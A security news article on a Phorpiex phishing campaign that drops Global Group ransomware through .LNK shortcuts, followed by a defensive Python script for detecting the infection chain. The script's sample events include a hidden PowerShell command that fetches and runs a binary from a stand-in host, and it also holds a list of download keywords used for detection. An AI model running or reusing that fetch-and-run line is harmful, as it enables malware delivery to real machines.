Phorpiex Botnet Resurfaces: Phishing Campaign Delivers Offline-Capable Global Group Ransomware

A new phishing campaign leveraging the infamous Phorpiex botnet has been observed distributing Global Group ransomware through weaponized Windows shortcut (.LNK) files, according to a new advisory from Forcepoint X-Labs.

The Attack Chain

The campaign uses phishing emails with the subject line “Your Document” — a lure that has remained effective throughout 2024 and 2025. Attackers disguise malicious shortcut files using double extensions like Document.doc.lnk, exploiting Windows' default behavior of hiding known file extensions.

Once opened, the infection chain unfolds rapidly:

  • The shortcut launches cmd.exe
  • PowerShell downloads a remote payload, saving it as windrv.exe
  • The binary executes silently without visible user prompts

Phorpiex: A 15-Year-Old Threat Still Thriving

Phorpiex is a modular malware-as-a-service (MaaS) botnet that has been active since approximately 2010. Despite its age, the botnet remains highly effective as a distribution platform for ransomware and other secondary malware.

Global Group Ransomware: Designed for Stealth

What makes Global Group ransomware particularly dangerous is its offline operation model. Unlike modern ransomware families that rely on command-and-control (C2) communication, Global Group:

  • Generates encryption keys locally — no C2 server contact required
  • Performs no data exfiltration — reducing network traffic that might trigger alerts
  • Functions in air-gapped environments — a significant threat to isolated systems

The ransomware uses the ChaCha20-Poly1305 encryption algorithm and appends the .Reco extension to encrypted files. A ransom note titled README.Reco.txt is dropped across the system, and the desktop wallpaper is replaced with a GLOBAL GROUP message.

Adding to forensic challenges, the malware deletes itself after execution and removes shadow copies, severely complicating recovery efforts.

Why This Matters

“This campaign demonstrates how long-standing malware families like Phorpiex remain highly effective when paired with simple but reliable phishing techniques,” Forcepoint noted. “By exploiting familiar file types such as Windows shortcut files, attackers can gain initial access with minimal friction.”

Recommendations

  • Block .LNK attachments at the email gateway
  • Enable file extension display in Windows to expose double-extension tricks
  • Monitor for suspicious PowerShell execution following shortcut file access
  • Maintain offline backups — critical given Global Group's shadow copy deletion
  • Train users to recognize phishing emails with generic document lures
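The attack chain and the "monitor for suspicious PowerShell execution following shortcut file access" recommendation above can be turned into a small detection rule. The following Python is an added example written for this article, not code from Forcepoint or from the advisory: it flags the double-extension .lnk naming trick and the explorer.exe -> cmd.exe -> PowerShell -> dropped-binary sequence described in the attack chain. The process-creation records are constructed for the illustration and shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the URL, paths and command lines are made-up sample values, and the list of "download hints" is an assumed heuristic rather than anything from the page.

```python
"""Added example (not from the original article): flag the LNK -> cmd.exe ->
PowerShell -> dropped .exe chain in process-creation telemetry, plus the
double-extension shortcut naming trick. All sample data below is constructed."""
import re
from dataclasses import dataclass

# Lure document extensions hidden in front of ".lnk" (e.g. Document.doc.lnk).
DOUBLE_EXT_LNK = re.compile(r"\.(doc|docx|pdf|xls|xlsx|txt)\.lnk$", re.IGNORECASE)

# Assumed heuristic: PowerShell download primitives commonly seen in one-liners.
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
                  "net.webclient", "start-bitstransfer", "curl ", "wget ")

# User-writable locations a dropped payload is typically written to.
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\")


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1-like field names)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events: three malicious stages and two benign records.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c powershell -w hidden -c "Invoke-WebRequest '
              r'http://payload.example.invalid/f -OutFile C:\Users\Public\windrv.exe; '
              r'Start-Process C:\Users\Public\windrv.exe"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -c "Invoke-WebRequest http://payload.example.invalid/f '
              r'-OutFile C:\Users\Public\windrv.exe; Start-Process C:\Users\Public\windrv.exe"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\Public\windrv.exe", r"C:\Users\Public\windrv.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              r'"WINWORD.EXE" C:\Users\alice\Documents\Document.docx'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -c Get-ChildItem C:\logs"),
]


def basename(path: str) -> str:
    """Return the lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_double_extension_lnk(filename: str) -> bool:
    """True for names like Document.doc.lnk that rely on hidden extensions."""
    return DOUBLE_EXT_LNK.search(filename) is not None


def is_download_to_exe(cmdline: str) -> bool:
    """True when a command line both fetches from the network and names an .exe."""
    low = cmdline.lower()
    return any(h in low for h in DOWNLOAD_HINTS) and ".exe" in low


def detect_lnk_chain(events):
    """Return one alert string per event that matches a stage of the chain."""
    alerts = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        cmd = ev.command_line
        # Stage 1: a double-clicked shortcut runs its target under explorer.exe.
        if parent == "explorer.exe" and child == "cmd.exe" and "powershell" in cmd.lower():
            alerts.append(f"LNK-style launch: explorer.exe -> cmd.exe invoking PowerShell: {cmd}")
        # Stage 2: PowerShell under cmd.exe pulling a remote binary to disk.
        if parent == "cmd.exe" and child in ("powershell.exe", "pwsh.exe") and is_download_to_exe(cmd):
            alerts.append(f"PowerShell download-to-exe under cmd.exe: {cmd}")
        # Stage 3: PowerShell starting an .exe from a user-writable location.
        if (parent in ("powershell.exe", "pwsh.exe") and child.endswith(".exe")
                and any(d in ev.image.lower() for d in USER_WRITABLE)):
            alerts.append(f"PowerShell launched dropped binary: {ev.image}")
    return alerts


if __name__ == "__main__":
    for name in ("Document.doc.lnk", "Document.docx", "shortcut.lnk"):
        print(f"{name}: double-extension lnk = {is_double_extension_lnk(name)}")
    for alert in detect_lnk_chain(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Each stage is reported separately so a single missed event does not hide the whole chain; correlating the three alerts on the same host within a short window gives a high-confidence hit. The double-extension check complements the second recommendation: with extensions shown (the Explorer setting HideFileExt = 0 under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced), a user sees Document.doc.lnk rather than Document.doc.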

Source: Infosecurity Magazine